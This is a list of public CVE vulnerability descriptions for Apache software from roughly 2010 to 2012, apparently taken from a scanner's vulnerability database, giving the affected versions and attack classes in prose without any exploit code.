| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
5283| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5284| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
